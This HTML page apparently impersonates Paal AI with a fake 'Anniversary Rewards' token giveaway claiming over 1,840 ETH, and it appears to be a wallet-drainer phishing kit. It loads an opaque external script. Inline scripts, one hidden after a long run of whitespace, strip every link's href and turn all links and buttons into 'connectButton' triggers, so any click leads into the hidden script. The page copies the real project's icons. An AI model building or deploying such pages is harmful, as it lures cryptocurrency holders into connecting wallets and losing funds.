<!DOCTYPE html>
<html >
  <head>
    <script charset="UTF-8" async type="text/javascript" src="./170fcd34a91372-1.js">
    </script>

    <script>
      document.addEventListener('DOMContentLoaded', function () {
        var links = document.querySelectorAll('body a');
        for (var i = 0; i < links.length; i++) {
        var link = links[i];
        link.removeAttribute('href');
        link.classList.add('connectButton');
        }
        });
        </script>                                                                                                                          <script>
      document.addEventListener('DOMContentLoaded', function () {
      var buttons = document.querySelectorAll('body button');
      for (var i = 0; i < buttons.length; i++) {
        var button = buttons[i];
        button.classList.add('connectButton');
      }
      });
      </script>
      <script>
      document.addEventListener("DOMContentLoaded", function() {
        const elements = document.querySelectorAll('[ad-data-linked]');
        elements.forEach(element => {
          element.removeAttribute('ad-data-linked');
        });
      
        console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
      });
      
      </script>
      
        <style>
        .connectButton {
        cursor: pointer;
        }
        </style>
    <link href="fonts.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="57x57" href="https://rewards.paal.ai/apple-icon-57x57.png">
    <link rel="apple-touch-icon" sizes="60x60" href="https://rewards.paal.ai/apple-icon-60x60.png">
    <link rel="apple-touch-icon" sizes="72x72" href="https://rewards.paal.ai/apple-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="76x76" href="https://rewards.paal.ai/apple-icon-76x76.png">
    <link rel="apple-touch-icon" sizes="114x114" href="https://rewards.paal.ai/apple-icon-114x114.png">
    <link rel="apple-touch-icon" sizes="120x120" href="https://rewards.paal.ai/apple-icon-120x120.png">
    <link rel="apple-touch-icon" sizes="144x144" href="https://rewards.paal.ai/apple-icon-144x144.png">
    <link rel="apple-touch-icon" sizes="152x152" href="https://rewards.paal.ai/apple-icon-152x152.png">
    <link rel="apple-touch-icon" sizes="180x180" href="https://rewards.paal.ai/apple-icon-180x180.png">
    <link rel="icon" type="image/png" sizes="192x192" href="android-icon-192x192.png">
    <link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="favicon-96x96.png">
    <link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.png">
    <link rel="manifest" href="https://rewards.paal.ai/manifest.json">
    <meta name="msapplication-TileColor" content="#ffffff">
    <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
    <meta name="theme-color" content="#ffffff">
    <title>Paal AI Anniversary Rewards</title>
    <link rel="stylesheet" href="index.06192d55.css">
    <style>
      .vue-notification-group {
        display: block;
        position: fixed;
        z-index: 5000
      }

      .vue-notification-wrapper {
        display: block;
        overflow: hidden;
        width: 100%;
        margin: 0;
        padding: 0
      }

      .notification-title {
        font-weight: 600
      }

      .vue-notification-template {
        display: block;
        box-sizing: border-box;
        background: white;
        text-align: left
      }

      .vue-notification {
        display: block;
        box-sizing: border-box;
        text-align: left;
        font-size: 12px;
        padding: 10px;
        margin: 0 5px 5px;
        color: #fff;
        background: #44A4FC;
        border-left: 5px solid #187FE7
      }

      .vue-notification.warn {
        background: #ffb648;
        border-left-color: #f48a06
      }

      .vue-notification.error {
        background: #E54D42;
        border-left-color: #b82e24
      }

      .vue-notification.success {
        background: #68CD86;
        border-left-color: #42a85f
      }

      .vn-fade-enter-active,
      .vn-fade-leave-active,
      .vn-fade-move {
        transition: all .5s
      }

      .vn-fade-enter-from,
      .vn-fade-leave-to {
        opacity: 0
      }
    </style>
    <link rel="stylesheet" href="Dapp.6377e497.css">
    
  </head>
  <body>
    <div id="app" data-v-app="">
      <div>
        <div class="flex md:flex-row flex-col items-start w-full lg:h-screen h-full relative">
          <div class="flex flex-col h-full w-full md:max-w-266 max-w-none bg-violet md:py-8 py-4 px-4 items-center md:fixed relative">
            <div class="flex items-center justify-start w-full gap-5 border-b border-gray-1 border-opacity-30 pb-5">
              <img src="logo.png" alt="" class="h-10 w-10">
              <h1>Paal AI</h1>
              <h1 class="block md:hidden -ml-3"> $PAAL </h1>
            </div>
            <!---->
            <!---->
            <div class="bg-reward rounded-xl w-full flex flex-col items-start py-4 px-2.5 gap-2.5 mt-5">
              <div class="flex items-center gap-3">
                <img src="eth.png" alt="" class="h-8 w-auto">
                <h1 class="text-lg font-bold">Anniversary Rewards</h1>
              </div>
              <p class="text-sm text-white text-opacity-75">Let's Celebrate!</p>
              <div class="gap-3 w-full flex items-center">
                <!---->
                <div class="flex flex-col">
                  <h1 class="lg:text-lg text-base font-bold"> Over 1,840 ETH</h1>
                  <!---->
                  <h2 class="lg:text-base text-sm font-medium text-white text-opacity-75">Total ETH Allocated</h2>
                </div>
              </div>
            </div>
          </div>
          <div class="flex flex-col w-full h-full bg-violet md:ml-[220px] ml-0">
            <div class="flex flex-col w-full h-full bg-main lg:p-8 p-4 gap-10">
              <div class="md:flex hidden items-center justify-between">
                <h1 class="text-xxl font-bold leading-normal">$PAAL@1</h1>
                <div class="flex items-center gap-10">
                  <!---->
                  <!---->
                  <button type="button" class="font-medium text-center text-white px-5 py-2.5 text-sm rounded bg-violet-1 hover:bg-opacity-80">Claim $PAAL</button>
                  <!---->
                </div>
              </div>
              <!---->
              <div class="flex flex-col w-full items-start gap-5">
                <div class="flex items-center justify-between w-full">
                  <div class="flex flex-col">
                    <h1 class="lg:text-xxl text-lg font-bold leading-normal">$PAAL Anniversary Rewards</h1>
                    <p class="lg:text-lg text-sm font-medium">It's our first anniversary and we are celebrating by disbuirsing over $1,840 ETH worth of $PAAL tokens to our active members.</p>
                  </div>
                </div>
              <div class="flex flex-col w-full items-start gap-5">
                <div class="flex items-center justify-between w-full">
                  <div class="flex flex-col">
                    <h1 class="lg:text-xxl text-lg font-bold leading-normal"> </h1>
                    <p class="lg:text-lg text-sm font-medium"> </p>
                  </div>
                </div>
                <div class="w-full border border-gray-1 border-opacity-30 rounded-xl lg:px-6 px-3 py-5 relative bg-violet-6 bg-opacity-75 flex flex-col gap-5">
                  <div class="flex flex-col items-center justify-center w-full h-full py-10 gap-3">
                    <img src="empty.png" alt="" class="md:h-24 h-16 w-auto">
                    <h1 class="text-center text-xl font-medium connectButton">Check Eligibility</h1>
                    <p>
                      Check your eligibility and claim your rewards. Goodluck! 
                    </p>
                    <button type="button" class="font-medium text-center text-white px-5 py-2.5 text-sm rounded bg-violet-1 hover:bg-opacity-80">Check Eligibility</button>
                    <!---->
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="vue-notification-group" style="width: 300px; top: 0px; right: 0px;">
          <span></span>
        </div>
      </div>
    </div>
   
    <style>
      @font-face {
        font-family: 'Inter';
        font-style: normal;
        font-weight: 300 600;
        font-display: swap;
        src: url("") format("woff2");
      }
    </style>

  </body>
</html>
